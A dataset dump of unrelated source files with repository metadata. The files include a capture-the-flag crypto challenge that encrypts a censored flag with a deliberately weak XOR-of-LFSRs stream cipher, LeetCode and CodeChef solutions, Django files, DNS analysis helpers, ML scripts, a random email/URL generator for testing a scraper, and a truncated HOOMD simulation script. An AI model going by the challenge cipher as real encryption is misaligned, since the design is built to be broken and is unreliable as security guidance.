cf7667fb4f83684e14b05ef5391d592319cc1bf8 | 24a966b5c2d97c68cff0bbcb0c15aa6d11cecd25 | /challenges/crypto/BabyLFSR/dist/encryptCensored.py | f03ee4a363fc84d9ae8f659fe2c832619a3f6ffc | [] | no_license | Whitehat-Society/whitehacks-challenges-2020-public | d416e86ed8856517820bdf0e2628e9ecfe10180c | d331c91ec257c218c5fae0980a3dbdd2131e084f | refs/heads/master | 2022-11-29T10:51:02.073300 | 2020-08-08T16:03:04 | 2020-08-08T16:03:04 | 285,588,050 | 12 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,732 | py | #! /usr/bin/python3
import random
KEYS = [64, 64, 64, 64]
TAPS = [15564440312192434176, 15564440312192434176, 15564440312192434176, 15564440312192434176]
class LSFR:
def __init__(self, state, taps, length):
self.taps = taps
self.state = state
self.length = 2**length
def getNext(self):
out = 0
xored = self.taps & self.state
while xored > 0:
if xored % 2 == 1:
out = 1 - out
xored //= 2
self.state = (self.state*2 + out)%self.length
return out
class StreamCipher:
def __init__(self, func, *args):
self.lsfr = list(args)
self.func = func
def encrypt(self, string):
bits = []
key = []
for char in string:
out = self.func(list(map(lambda x: x.getNext(), self.lsfr)))
bits.append(char ^ out)
key.append(out)
enc = []
while bits:
enc.append(chr(int(''.join(map(str, bits[0:8])), 2)))
bits = bits[8:]
return ''.join(enc)
def main():
# Unbruteforcable 256 bit key muahahaha
seed = random.randrange(2**sum(KEYS))
# Seeding
a = LSFR(seed % 2**KEYS[0], TAPS[0], KEYS[0]); seed //= 2**KEYS[0]
b = LSFR(seed % 2**KEYS[1], TAPS[1], KEYS[1]); seed //= 2**KEYS[1]
c = LSFR(seed % 2**KEYS[2], TAPS[2], KEYS[2]); seed //= 2**KEYS[2]
d = LSFR(seed % 2**KEYS[3], TAPS[3], KEYS[3]); seed //= 2**KEYS[3]
flag = "WH2020{<CENSORED>}"
flag = map(int, ''.join('{0:08b}'.format(ord(x), 'b') for x in flag))
cipher = StreamCipher(lambda l:l[0]^l[1]^l[2]^l[3], a, b, c, d)
file = open("out.out", "w")
file.write(cipher.encrypt(flag))
file.close()
main()
| [
"wongwaituck@gmail.com"
] | wongwaituck@gmail.com |
13eda0de95f9467954a2064cc95a5abdd0b0ec64 | 9e831c0defd126445772cfcee38b57bfd8c893ca | /code/questions/221~230_/224.py | d90b7f67cdd7fc5614ac658666790161c4a04e2c | [] | no_license | m358807551/Leetcode | 66a61abef5dde72250d032b7ea06feb3f2931d54 | be3f037f6e2057a8f2acf9e820bbbbc21d7aa1d2 | refs/heads/main | 2023-04-22T15:13:43.771145 | 2021-05-07T06:47:13 | 2021-05-07T06:47:13 | 321,204,181 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,174 | py | """
https://leetcode-cn.com/problems/basic-calculator
"""
import re
class Solution(object):
def calculate(self, s):
"""
:type s: str
:rtype: int
"""
s = re.sub('[^0-9]', lambda x: '!{}!'.format(x.group()), s)
s = [x for x in s.split('!') if x.strip()]
queue, stack = [], []
for x in s:
if x == '(':
stack.append(x)
elif x in '+-':
while stack and stack[-1] in '+-':
queue.append(stack.pop(-1))
stack.append(x)
elif x == ')':
while stack[-1] != '(':
queue.append(stack.pop(-1))
stack.pop(-1)
else:
queue.append(int(x))
while stack:
queue.append(stack.pop(-1))
stack = []
for x in queue:
if x == '+':
stack.append(stack.pop(-2) + stack.pop(-1))
elif x == '-':
stack.append(stack.pop(-2) - stack.pop(-1))
else:
stack.append(x)
return stack[0]
print(
Solution().calculate(
'(71)-(0)+(14)'
)
)
| [
"m358807551@163.com"
] | m358807551@163.com |
8c9e8735d73a9563e4359e5781a1b5f3533944dd | e3ec66558bd5593c3bac63663e965cfb335e3682 | /teacher/migrations/0009_auto_20200613_2357.py | 1b66a02e81ba428332881d236225115087d875de | [] | no_license | piyushagar/Repo_EduCham | 66d4393e888863f355c59313e0ddc8147c3445ed | e2af04c3ab338e75bfd8746b4e8a4cc32e98ebc7 | refs/heads/master | 2022-11-21T06:33:10.160013 | 2020-07-28T11:35:13 | 2020-07-28T11:35:13 | 282,602,518 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 528 | py | # Generated by Django 2.2.12 on 2020-06-13 18:27
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('teacher', '0008_auto_20200611_1524'),
]
operations = [
migrations.RemoveField(
model_name='domain',
name='updated_domain',
),
migrations.AddField(
model_name='domain',
name='visit_num',
field=models.PositiveIntegerField(default=0),
),
]
| [
"themindzworld@gmail.com"
] | themindzworld@gmail.com |
494853650bc48daabecbdd20ffd1824486452123 | 743d1918178e08d4557abed3a375c583130a0e06 | /src/ToCPSC/getDailyCount.py | dc5994f9a0237db0f7b31ecd26d5406d7d555d78 | [] | no_license | aquablue1/dns_probe | 2a027c04e0928ec818a82c5bf04f485a883cfcb3 | edd4dff9bea04092ac76c17c6e77fab63f9f188f | refs/heads/master | 2020-03-25T19:40:07.346354 | 2018-11-17T05:31:43 | 2018-11-17T05:31:43 | 144,094,014 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,405 | py | """
" Get the daily count of src of DNS sessions that sent to cpsc ns.
" By Zhengping on 2018-08-14
"""
from src.GeneralAnalysis.DailySrcCount import dailySrcCount
from src.GeneralAnalysis.DailyDstCount import dailyDstCount
from src.GeneralAnalysis.DailyQueryCount import dailyNameCount
from src.GeneralAnalysis.DailyTypeCount import dailyTypeCount
from src.GeneralAnalysis.DailySrcPortCount import dailySrcPortCount
def getDailySrcCount(date, foldername):
cpscSrcCounter = dailySrcCount(date, foldername)
cpscSrcCounter.getDailySrcCount()
def getDailyDstCount(date, foldername):
cpscDstCounter = dailyDstCount(date, foldername)
cpscDstCounter.getDailyDstCount()
def getDailyNameCount(date, foldername):
cpscNameCounter = dailyNameCount(date, foldername)
cpscNameCounter.getDailyNameCount()
def getDailyTypeCount(date, foldername):
cpscTypeCounter = dailyTypeCount(date, foldername)
cpscTypeCounter.getDailyTypeCount()
def getDailySrcPortCount(date, foldername):
cpscSrcPortCounter = dailySrcPortCount(date, foldername)
cpscSrcPortCounter.getDailySrcPortCount()
if __name__ == '__main__':
date = "2018-09-19"
foldername = "../../result/ToCPSC/"
getDailySrcCount(date, foldername)
getDailyDstCount(date, foldername)
getDailyNameCount(date, foldername)
getDailyTypeCount(date, foldername)
getDailySrcPortCount(date, foldername) | [
"94apieceofcake@gmail.com"
] | 94apieceofcake@gmail.com |
813b34903e5f3ee77820d5f996575d4777884df1 | fbbf145adf4a13eb4259497e045a6176ba264f7d | /Turbo Sort.py | 79507afb9cd79e553334a05a9f02e5734ceea622 | [] | no_license | prem17101996/CodeChef | f540803d5bbf7185f75ca8bf94b7bbb35b405302 | 2c71c6382b59fc2274c4d9d05a9aac834999b2da | refs/heads/main | 2023-03-28T11:34:51.419729 | 2021-03-30T15:07:14 | 2021-03-30T15:07:14 | 350,218,526 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 135 | py | t=int(input())
lst=[]
for i in range(t):
numbers=int(input())
lst.append(numbers)
lst.sort()
for item in lst:
print(item) | [
"premmishra17101996@gmail.com"
] | premmishra17101996@gmail.com |
fb667daf739dfa1b36e500e88c786b477b12dc1e | e73761205fdd93a3da3ac6a91a970efe164a334b | /DataStructure/Linkedlist/Linkedlistdemo.py | 7283ca3be527fcedda3d1b88282a8a9685b9b65b | [] | no_license | keer1305/Geeks | 90bffa43109cee50ee64e21f4c062b6519b95775 | 058a609e15dbbb1eebe087d1667277f56c6ff334 | refs/heads/master | 2020-03-27T17:50:46.043239 | 2018-09-11T04:37:00 | 2018-09-11T04:37:00 | 146,878,660 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 419 | py | class Node:
def __init__(self,data):
self.data=data
self.next=None
class LinkedList:
def _init_(self):
self.head=None
def printlist(self):
temp = self.head
while temp is not None:
print(temp.data,end=" ")
temp=temp.next
list=LinkedList()
list.head=Node("ONE")
c2=Node("TWO")
c3=Node("THREE")
list.head.next=c2
c2.next=c3
list.printlist()
| [
"skeerthi1305@gmail.com"
] | skeerthi1305@gmail.com |
0332de66313e7c834a9f8d41b8af3baf302e7042 | 909e2eafcd37023d9b9ecdefe52bf2dffe28daf4 | /mix_data_batcher.py | 7defdbd9b7633d06580064dea8a7bd324ab50fab | [] | no_license | Websail-NU/OTyper | 2796411e7a7ced79d3a297734c1ab509edcb47dc | b5301026b95e0eabf8eb8a286205b95dbb2b61dd | refs/heads/master | 2021-06-27T15:34:21.849512 | 2019-05-08T18:45:09 | 2019-05-08T18:45:09 | 93,091,277 | 8 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,933 | py | import numpy as np
import random
from scipy.sparse import save_npz, load_npz
class Vocabulary:
def __init__ (self):
self._w2i = {}
self._i2w = []
self.add_all()
def add_all(self):
pos = 0
with open('mix_data/word_list.txt', 'r') as f:
for line in f.readlines():
line = line.replace('\n', '')
self._w2i[line] = pos
self._i2w.append(line)
pos += 1
def w2i(self, word):
if word in self._w2i:
return self._w2i[word]
elif word.lower() in self._w2i:
return self._w2i[word.lower()]
else:
return self._w2i['unk']
def i2w(self, i):
return self._i2w[i]
class mix_data_multi_label:
def __init__ (self, batch_size = 1000, entity_file = 'mix_data/train_mix_word_with_context.txt', \
context_file = 'mix_data/train_mix_tagged_context.txt', \
type_file = 'mix_data/train_mix_Types_with_context_sparse.npz'):
self.shuffle_flag = 0
self.vob = Vocabulary()
self.load_data(entity_file, context_file, type_file)
self.train_pos = 0
self.batch_size = min(batch_size, len(self.Entity_var_ids))
self.total_batch_num = int(len(self.Entity_var_ids) / self.batch_size)
def load_data(self, entity_file, context_file, type_file, window_size = 10):
self.Entity_var_ids = []
with open(entity_file, 'r') as f:
for line in f:
t_l = []
for w in line.replace('\n','').split():
t_l.append(self.vob.w2i(w))
self.Entity_var_ids.append(t_l)
self.r_Left_context_ids = []
self.Right_context_ids = []
with open(context_file, 'r') as f:
for line in f:
context = line.replace('\n','')
t_r_Left_context_ids, t_Right_context_ids = \
self.get_r_left_right_context(context, window_size)
self.r_Left_context_ids.append(t_r_Left_context_ids)
self.Right_context_ids.append(t_Right_context_ids)
self.Types = load_npz(type_file)
self.r = list(range(0, len(self.Entity_var_ids)))
if self.shuffle_flag == 1:
self.shuffle()
def shuffle(self):
random.shuffle(self.r)
# select_flag == 0: select_all
# select_flag == 1: select train label, delete ids
# select_flag == 2: select test label, take ids
# def next_batch(self, window_size = 10, select_flag = 0, seen_label_ids = None, unseen_label_ids = None):
def next_batch(self, select_label_ids):
ret_Entity_var_ids = []
ret_r_Left_context_ids = []
ret_Right_context_ids = []
ret_Ys = []
count = 0
while count < self.batch_size:
local_Entity_var_ids = []
local_Left_context_ids = []
local_Right_context_ids = []
local_Entity_var_ids = self.Entity_var_ids[self.r[self.train_pos]]
local_r_Left_context_ids = self.r_Left_context_ids[self.r[self.train_pos]]
local_Right_context_ids = self.Right_context_ids[self.r[self.train_pos]]
local_Ys = self.Types[self.r[self.train_pos]].todense()
local_Ys = np.squeeze(np.asarray(local_Ys))
ret_Entity_var_ids.append(local_Entity_var_ids)
ret_r_Left_context_ids.append(local_r_Left_context_ids)
ret_Right_context_ids.append(local_Right_context_ids)
ret_Ys.append(local_Ys)
self.train_pos = (self.train_pos + 1) % (len(self.Entity_var_ids))
count += 1
ret_Entity_ids, ret_Entity_lens = vstack_list_padding_2d(ret_Entity_var_ids, padding_element = self.vob.w2i('_my_null_'))
ret_r_Left_context_ids, ret_Left_context_lens = vstack_list_padding_2d(ret_r_Left_context_ids, padding_element = self.vob.w2i('_my_null_'))
ret_Right_context_ids, ret_Right_context_lens = vstack_list_padding_2d(ret_Right_context_ids, padding_element = self.vob.w2i('_my_null_'))
ret_Left_context_ids = []
for e in ret_r_Left_context_ids:
ret_Left_context_ids.append(e[::-1])
ret_Entity_ids = np.asarray(ret_Entity_ids, dtype=np.float32)
ret_Entity_lens = np.asarray(ret_Entity_lens, dtype=np.float32)
batch_size = ret_Entity_ids.shape[0]
type_size = len(select_label_ids)
ret_Left_context_ids = np.asarray(ret_Left_context_ids, dtype=np.float32)
ret_Left_context_lens = np.asarray(ret_Left_context_lens, dtype=np.float32)
ret_Right_context_ids = np.asarray(ret_Right_context_ids, dtype=np.float32)
ret_Right_context_lens = np.asarray(ret_Right_context_lens, dtype=np.float32)
ret_Feature_ids = np.zeros((batch_size, 70))
t_type_only_features = np.zeros((batch_size, type_size, 3))
ret_Entity_type_features = np.zeros((batch_size, type_size, 3))
ret_Exact_entity_type_features = np.zeros((batch_size, type_size, 3))
ret_Type_only_features = np.zeros((batch_size, type_size, 3))
ret_Ys = np.asarray(ret_Ys, dtype=np.float32)
ret_Ys = np.take(ret_Ys, select_label_ids, 1)
return ret_Entity_ids, ret_Entity_lens, ret_Left_context_ids, ret_Left_context_lens, \
ret_Right_context_ids, ret_Right_context_lens, ret_Feature_ids, \
ret_Entity_type_features, ret_Exact_entity_type_features, \
ret_Type_only_features, ret_Ys
def get_r_left_right_context(self, context_string, window_size):
words = context_string.split()
l_pos = len(words)
r_pos = len(words)
for i in range(0, len(words)):
if words[i] == '<e>':
l_pos = i
if words[i] == '</e>':
r_pos = i
# r_l_context: r_ for reverse
r_l_context = []
for i in range(l_pos-1, -1, -1):
r_l_context.append(self.vob.w2i(words[i]))
if len(r_l_context) >= window_size:
break
r_context = []
for i in range(r_pos+1, len(words)):
r_context.append(self.vob.w2i(words[i]))
if len(r_context) >= window_size:
break
return r_l_context, r_context
def get_train_label_emb(label_embs, Ys):
return label_embs, Ys
def get_test_label_emb(label_embs, Ys):
return label_embs, Ys
def vstack_list_padding_2d(data, padding_element = 0, dtype=np.int32):
lengths = list(map(len, data))
max_len = max(lengths)
arr = np.zeros((len(data), max_len), dtype=dtype)
arr.fill(padding_element)
for i, row in enumerate(data):
arr[i, 0:len(row)] = row
return arr, np.array(lengths, dtype=np.int32)
if __name__ == "__main__":
a= mix_data_multi_label()
a.next_batch(list(range(0,100)))
| [
"zys133@thor.cs.northwestern.edu"
] | zys133@thor.cs.northwestern.edu |
882f9edf92e0ddbb10a8c25eb450ef6e191608d8 | f59f7272e9ada94499cd683cf5a43e04bcf92d43 | /mysite/urls.py | 5b43b266de2ebc7c743661026db9c162fc843f5b | [] | no_license | hateif/my-first-blog1 | 69a261b504bbd63746082147d271438f763432d3 | 1d2f8f9078a5ae332a3c181f85b96d5b2fcc0880 | refs/heads/master | 2021-01-10T10:40:33.386445 | 2016-01-14T07:17:47 | 2016-01-14T07:17:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 856 | py | """mysite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^blog/index/$', 'blog.views.index'),
url(r'^polls/', include('polls.urls')),
]
| [
"lihao@tdmarco.com"
] | lihao@tdmarco.com |
12dad381805512acbfb45f4df790488bcc3335bf | 0869d7edac80e8aebe951682a2cc311a083eade3 | /Python/tdw/object_data/composite_object/composite_object_dynamic.py | e9057a039e69ee0a014cfdd06af0f7a5dfabbdb8 | [
"BSD-2-Clause"
] | permissive | threedworld-mit/tdw | 7d5b4453832647733ff91ad7a7ce7ec2320454c1 | 9df96fba455b327bb360d8dd5886d8754046c690 | refs/heads/master | 2023-09-01T11:45:28.132298 | 2023-08-31T16:13:30 | 2023-08-31T16:13:30 | 245,492,977 | 427 | 75 | BSD-2-Clause | 2023-09-14T17:36:12 | 2020-03-06T18:42:09 | Python | UTF-8 | Python | false | false | 1,537 | py | from typing import Dict
from tdw.object_data.composite_object.sub_object.light_dynamic import LightDynamic
from tdw.object_data.composite_object.sub_object.hinge_dynamic import HingeDynamic
class CompositeObjectDynamic:
"""
Dynamic data for a composite object and its sub-objects.
Note that not all sub-objects will be in this output data because some of them don't have specialized dynamic properties.
For example, non-machines have dynamic positions, velocities, etc. but these can be found in `Transforms` and `Rigidbodies` data, respectively.
"""
def __init__(self, object_id: int, hinges: Dict[int, HingeDynamic], lights: Dict[int, LightDynamic]):
"""
:param object_id: The ID of the root object.
:param hinges: A dictionary of [`HingeDynamic`](sub_object/hinge_dynamic.md) sub-objects, which includes all hinges, springs, and motors.
:param lights: A dictionary of [`LightDynamic`](sub_object/light_dynamic.md) sub-objects such as lamp lightbulbs.
"""
""":field
The ID of the root object.
"""
self.object_id = object_id
""":field
A dictionary of [`HingeDynamic`](sub_object/hinge_dynamic.md) sub-objects, which includes all hinges, springs, and motors.
"""
self.hinges: Dict[int, HingeDynamic] = hinges
""":field
A dictionary of [`LightDynamic`](sub_object/light_dynamic.md) sub-objects such as lamp lightbulbs.
"""
self.lights: Dict[int, LightDynamic] = lights
| [
"alters@mit.edu"
] | alters@mit.edu |
e7d040ce1e08fba4331f7381d97868210cb2b86d | 866c5b1f43da3363ba6004c0394a24345b64c3e0 | /eval.py | 76da78c175f78ed19042b618b78205b692d49bfc | [] | no_license | vighneshbirodkar/deep_symmetry | 1e6bb23f954814051aca76204f5adfac18875254 | 57de3dcc7b97482f207bd1965fe5b666341e8677 | refs/heads/master | 2021-01-17T19:52:21.716981 | 2016-06-27T03:41:54 | 2016-06-27T03:41:54 | 62,023,523 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,137 | py | from __future__ import division, print_function
from external.slim import slim
import tensorflow as tf
from cnnutil import FolderReader
import numpy as np
from commons import get_pbar
from model import inference
SIZE = 32
x_train = tf.placeholder(tf.float32, shape=(None, SIZE, SIZE, 3))
y_train = tf.placeholder(tf.float32, shape=(None, 2))
y_pred = inference(x_train, is_training=False)
correct_preds = tf.equal(tf.argmax(y_pred, 1), tf.argmax(y_train, 1))
fr = FolderReader('./samples', 32, 32)
sess = tf.Session()
sess.run(tf.initialize_all_variables())
saver = tf.train.Saver()
saver.restore(sess, './models/model-1')
pbar = get_pbar(fr.get_validation_size())
seen_samples = 0
correct_samples = 0
for x_batch, y_batch in fr.get_validation_batch(100):
seen_samples += x_batch.shape[0]
fd = {x_train: x_batch, y_train: y_batch}
preds = sess.run([correct_preds], feed_dict=fd)
cp = np.sum(preds)
correct_samples += cp
pbar.update(seen_samples, Accuracy=100*cp/x_batch.shape[0])
pbar.finish()
print('Validation Accuracy = %f' %
(100*float(correct_samples) / float(fr.get_validation_size())))
| [
"vighneshbirodkar@nyu.edu"
] | vighneshbirodkar@nyu.edu |
e249c35845603892c2544a6ffa2a1cf888414eb8 | c7baedd81f9daa6921714b4b44e8496d02fc2d96 | /testlib.py | 1231b3840b3053f71e8b68a320e9a45b0f2601e2 | [] | no_license | santonsh/accenture_scrapper_practice | cc569bb45394718e85f11fe9e716a4c9673c68ca | 71c4a9f70aeb6ff2350012172e5b5195ec1d34df | refs/heads/master | 2022-04-16T05:15:36.639425 | 2020-04-13T21:07:30 | 2020-04-13T21:07:30 | 254,945,674 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,380 | py | import random
from math import floor
valid_domain_name_chars = [c for c in range(48,57)]+[c for c in range(65,90)]+[c for c in range(97,122)]+[45]
valid_username_chars = [c for c in range(48,57)]+[c for c in range(65,90)]+[c for c in range(97,122)]+[45,46,43,95]
def generate_string(length, valid_set):
return [chr(random.choice(valid_set)) for _ in range(length)]
def generate_email():
"""generates valid email addresses"""
valid_domain_name_chars = [c for c in range(48,57)]+[c for c in range(65,90)]+[c for c in range(97,122)]+[45]
username = ''.join(generate_string(10, valid_username_chars))
domainname = ''.join(generate_string(10, valid_domain_name_chars))
domain = random.choice(['com', 'co.il', 'info'])
return username+'@'+domainname+'.'+domain
def generate_domainname():
"""generates a domain name. Part of url generation chain"""
domainname = ''.join(generate_string(10, valid_domain_name_chars))
domain = random.choice(['com', 'co.il', 'info'])
return domainname+'.'+domain
def generate_url(domainname = None):
"""generates simple url. Possibly with given domainname"""
path_length = random.choice([1,2,3,4,5])
path = ''
for i in range(path_length):
path = path + '/' + ''.join(generate_string(5, valid_domain_name_chars))
if domainname:
return 'http://www.'+domainname+path
else:
return 'http://www.'+generate_domainname()+path
def generate_link(domainname = None):
return '<a href="'+generate_url(domainname)+'"></a>'
def generate_page(links, emails):
"""generates random page incorporating given links and emails"""
s = ''.join(generate_string(30, valid_domain_name_chars))
for i in links:
s = s + ' ' + '<a href="'+i+'"></a>' + ' ' +''.join(generate_string(30, valid_domain_name_chars))
s = s + ' ' +''.join(generate_string(30, valid_domain_name_chars))
for i in emails:
s = s + ' ' + i + ' ' +''.join(generate_string(30, valid_domain_name_chars))
s = s + ' ' +''.join(generate_string(30, valid_domain_name_chars))
return s
class testNode():
"""this is a node representing a test internet page with its links and emails"""
def __init__(self, url, links, emails):
self.url = url
self.links = links
self.emails = emails
self.page = ''
def generate_page(self):
self.page = generate_page(self.links, self.emails)
def get_page(self):
return self.page
def generate_test_graph(sameDomain = False):
"""Simple non deterministic algorithm to generate test internet graph to be used in tests. The test graph is very link redundant. Need to generate thinner graph later """
num = 100
urls = []
emails = []
nodes={}
if sameDomain:
domain = generate_domainname()
else:
domain = None
for i in range(num):
urls.append(generate_url(domain))
emails.append(generate_email())
used_urls = set()
used_emails = set()
for u in urls:
l = random.choices(urls, k = floor(num/4))
#l = [u for u in urls]
e = random.choices(emails, k = floor(num/10))
#e = [e for e in emails]
used_urls.update(l)
used_emails.update(e)
nodes[u] = testNode(u, l, e)
nodes[u].generate_page()
return nodes, urls, emails
| [
"santonsh@gmail.com"
] | santonsh@gmail.com |
5f1d5f3868ca2f03ad7087cb4da80a572750a29e | 0a5eb3d095191f6b8eefbc2ae364bfc7c2ad6380 | /wales_diamonds.py | 15033f0fd706b20eeb9c6fe172c9ca8862b94b0d | [] | no_license | jaeilpark/self_assembly | 8d96a41811e35a547fa6bd04426631db55951cbd | da7f65290f1d0cc0244cac31276f0961b45dd30c | refs/heads/master | 2023-03-19T17:07:28.617925 | 2019-10-29T04:37:33 | 2019-10-29T04:37:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,721 | py | #!/share/apps/md/bin/pyt2.7
import os, sys, re, time, math
from config_dict import config_dict
from hoomd import *
from hoomd import md
from hoomd import data
from hoomd import deprecated
context.initialize()
try:
seed = int(sys.argv[2])
config = config_dict(sys.argv[1])
except:
print "Usage: %s <input_file> <seed>" % sys.argv[0]
raise
start=0
#load gsd file to initialize system
if not os.path.exists('sd%s.gsd' % seed):
from gen_wales_diamonds_poly import GenMulti
GenMulti(config, seed)
start=1
system = init.read_gsd(filename='sd%s.gsd' % seed, restart='sd%s_a.gsd')
else:
print(os.getcwd() + "\n")
with open('sd%s.log'%seed) as f:
timeStep = int(f.readlines()[-1].split('\t')[0])+1
print('restarting from %d'%timeStep)
system = init.read_gsd(filename='sd%s_a.gsd' % seed, restart='sd%s_b.gsd',time_step=timeStep)
#load atomic positions
atomPositionsFile1 = config['Atom Positions File1']
atom_pos1=[]
#with open(atomPositionsFile,'r') as fPos:
fPos = open(atomPositionsFile1,'r')
for line in fPos:
data = line.strip().split()
atom_pos1.append( map(float,data) )
#list of atoms in CP B-C
nameList1= ['TC']+['TB'] + ['X1'] + ['X1'] + ['A1B']+['A1B'] + ['A2C']+['A2B'] + ['A3C']+['A5B']+['A5C']+['A3B'] + ['A4C']+['A6B']+['A6C']+['A4B']+['X1']*4+['X2']*4+['Q']*12
beadsizeList1 = [1.0]*4 + [0.1]*12 + [1.0]*4 + [0.8]*4 + [0.5]*12
#load atomic positions
atomPositionsFile2 = config['Atom Positions File2']
atom_pos2=[]
#with open(atomPositionsFile,'r') as fPos:
fPos = open(atomPositionsFile2,'r')
for line in fPos:
data = line.strip().split()
atom_pos2.append( map(float,data) )
#list of atoms in CP A-A
nameList2 = ['TA']*2 + ['X1']*2 + ['A1A']+['A1A'] + ['A2A']+['A2A'] + ['A5A']+['A3A']+['A3A']+['A5A'] + ['A6A']+['A4A']+['A4A']+['A6A']+['X1']*4+['X2']*4+['Q']*12
beadsizeList2 = [1.0]*4 + [0.1]*12 + [1.0]*4 + [0.8]*4 + [0.5]*12
#set up twp rigid bodies
#rigid body 1
rigid = md.constrain.rigid()
rigid.set_param('C0', positions=atom_pos1, types=nameList1, diameters=beadsizeList1)
rigid.set_param('C1', positions=atom_pos2, types=nameList2, diameters=beadsizeList2)
rigid.create_bodies(create=True)
#dump mol2 file
if start==1:
from gen_wales_diamonds_poly import mol2generator
mol2generator(system,seed)
ebondCC = float(config['MultiSphere Bond Strength'])
ebondCCvert = ebondCC/2.0
###Neighbor list
nl=md.nlist.tree() #bonds are exlcuded from short range interaction by default
nl.reset_exclusions(exclusions = ['bond'])
#parameters for morse potential
#define groups
rigid = group.rigid()
centralrigid = group.rigid_center() #CPs
nonrigid = group.nonrigid() #RNA
integrableparts = group.union(name='int-particles',a=centralrigid, b=nonrigid)
r0 = 0.2
rho = float(config['rho'])
morsecut=2.0
alpha = rho/r0
morse = md.pair.morse(r_cut=morsecut, nlist=nl)
morse.set_params(mode="shift") #This line may have been left out previously!!!
morse.pair_coeff.set(['C0','C1','P','TA','TB','TC','A1A','A1B','A2A','A2B','A3A','A3B','A4A','A4B','A5A','A5B','A6A','A6B','A1C','A2C','A3C','A4C','A5C','A6C','X1','X2','Q'],['C0','C1','P','TA','TB','TC','A1A','A1B','A2A','A2B','A3A','A3B','A4A','A4B','A5A','A5B','A6A','A6B','A1C','A2C','A3C','A4C','A5C','A6C','X1','X2','Q'],D0=0,alpha=alpha,r0=r0,r_cut=0.0)
#LJ Interactions:
sigmaTop=2.25 #completely arbitary, to prevent overlap
pol_sigma = float(config['Pol sigma'])
polX1Cut=0.5*(pol_sigma+1.0)
polX2Cut=0.5*(pol_sigma+0.8)
topRepulsion=(ebondCC/4)
topCut=sigmaTop
lj = md.pair.lj(r_cut=topCut, nlist=nl)
lj.set_params(mode="shift")
lj.pair_coeff.set(['C0','C1','P','TA','TB','TC','A1A','A1B','A2A','A2B','A3A','A3B','A4A','A4B','A5A','A5B','A6A','A6B','A1C','A2C','A3C','A4C','A5C','A6C','X1','X2','Q'],['C0','C1','P','TA','TB','TC','A1A','A1B','A2A','A2B','A3A','A3B','A4A','A4B','A5A','A5B','A6A','A6B','A1C','A2C','A3C','A4C','A5C','A6C','X1','X2','Q'],alpha=0,epsilon=0,r_cut=0,sigma=0)
lj.pair_coeff.set('TB','TB',alpha=0,epsilon=topRepulsion,r_cut=sigmaTop,sigma=sigmaTop)
lj.pair_coeff.set('TA','TC',alpha=0,epsilon=topRepulsion,r_cut=sigmaTop,sigma=sigmaTop)
#lj.pair_coeff.set(['P'],['BA','BB','BC'],alpha=1,epsilon=ebondCP,r_cut=particleSigma*3.0,sigma=particleSigma)
#even though A-A don't bind, TA-TA repulsion may be necessary to prevent wierd overlapping thing.
lj.pair_coeff.set('TA','TA',alpha=0,epsilon=topRepulsion,r_cut=1.75,sigma=1.75)
lj.pair_coeff.set('TC','TC',alpha=0,epsilon=topRepulsion,r_cut=1.75,sigma=1.75)
lj.pair_coeff.set('TB','TC',alpha=0,epsilon=topRepulsion,r_cut=1.75,sigma=1.75)
lj.pair_coeff.set('TB','TA',alpha=0,epsilon=topRepulsion,r_cut=1.75,sigma=1.75)
#lj.pair_coeff.set('P','BA',alpha=0,epsilon=1,r_cut=polQCut,sigma=polQCut)
#lj.pair_coeff.set('P','BB',alpha=0,epsilon=1,r_cut=polQCut,sigma=polQCut)
#lj.pair_coeff.set('P','BC',alpha=0,epsilon=1,r_cut=polQCut,sigma=polQCut)
lj.pair_coeff.set('P','Q',alpha=0,epsilon=1,r_cut=pol_sigma, sigma=pol_sigma)
lj.pair_coeff.set('P','P',alpha=0,epsilon=1,r_cut=pol_sigma, sigma=pol_sigma)
lj.pair_coeff.set('P',['C0','C1','X1'],alpha=0,epsilon=1,r_cut=polX1Cut,sigma=polX1Cut)
lj.pair_coeff.set('P','X2',alpha=0,epsilon=1,r_cut=polX2Cut,sigma=polX2Cut)
lj.pair_coeff.set('X1','X1',alpha=0,epsilon=1,r_cut=1.0, sigma=1.0)
lj.pair_coeff.set('X2','X2',alpha=0,epsilon=1,r_cut=0.8,sigma=0.8)
lj.pair_coeff.set('X1','X2',alpha=0,epsilon=1,r_cut=0.9,sigma=0.9)
#parameters for polymer
unitLength=1
pol_charge = float(config['Pol charge'])
polBend=0
#polymer
harmonic = md.bond.harmonic()
harmonic.bond_coeff.set('bondPP', k=330.0*unitLength**2, r0=pol_sigma)
harmonic = md.angle.harmonic()
harmonic.angle_coeff.set('anglePPP', k=polBend, t0=3.1415)
#yukawa parameters
chargeQ = float(config['Bead charge'])
lDebye = float(config['Debye'])
kappa = 1.0/lDebye
bjerrum= 0.7
yukawaPrefactor = bjerrum * lDebye * math.exp(pol_sigma/lDebye)/(lDebye+pol_sigma)
rc = 3.0*lDebye
ron = 2.0*lDebye
print "For Debye length of %f rb, Yukawa Kappa = %f and Yukawa Epsilon = %f" % (lDebye, kappa, yukawaPrefactor)
#polymer-CP interactions
yukawa = md.pair.yukawa(r_cut=rc, nlist=nl)
yukawa.set_params(mode="xplor")
